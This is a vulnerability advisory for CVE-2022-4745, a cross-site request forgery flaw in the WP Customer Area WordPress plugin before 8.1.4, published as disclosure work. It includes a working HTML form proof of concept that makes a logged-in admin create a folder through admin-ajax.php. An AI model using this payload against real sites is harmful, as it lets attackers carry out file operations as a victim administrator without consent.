WordPress Plugin Vulnerabilities

WP Customer Area < 8.1.4 - Unauthorised Actions via CSRF

Description

The plugin does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.

Proof of Concept

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://example.com/wp-admin/admin-ajax.php"><table><tr><td>action</td><td><input type="text" value="cuar_folder_action" name="action"></td></tr>
<tr><td>folder_action</td><td><input type="text" value="mkdir" name="folder_action"></td></tr>
<tr><td>path</td><td><input type="text" value="/var/www/html/wp-content/tmpp" name="path"></td></tr>
<tr><td>extra</td><td><input type="text" value="0770" name="extra"></td></tr>
</table><input type="submit" value="https://example.com/wp-admin/admin-ajax.php"></form></html>

Affects Plugins

Plugin icon
customer-area
Fixed in 8.1.4

References

CVE
CVE-2022-4745

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
rezaduty
Submitter
rezaduty
Verified
Yes
WPVDB ID
9703f42e-bdfe-4787-92c9-47963d9af425

Timeline

Publicly Published
2023-01-17 (about 1 years ago)
Added
2023-01-17 (about 1 years ago)
Last Updated
2023-01-18 (about 1 years ago)

Other

Published
Title
Published
2023-03-10
Title
GiveWP < 2.25.2 - Cross-Site Request Forgery
Published
2022-09-22
Title
Customer Reviews for WooCommerce < 5.3.6 - Cross-Site Request Forgery
Published
2021-06-17
Title
WP Fluent Forms < 3.6.67 - Cross-Site Request Forgery (CSRF)
Published
2023-10-19
Title
Delete Usermetas < 1.2.0 - Cross-Site Request Forgery
Published
2023-02-20
Title
Social Login WP <= 5.0.0.0 - CSRF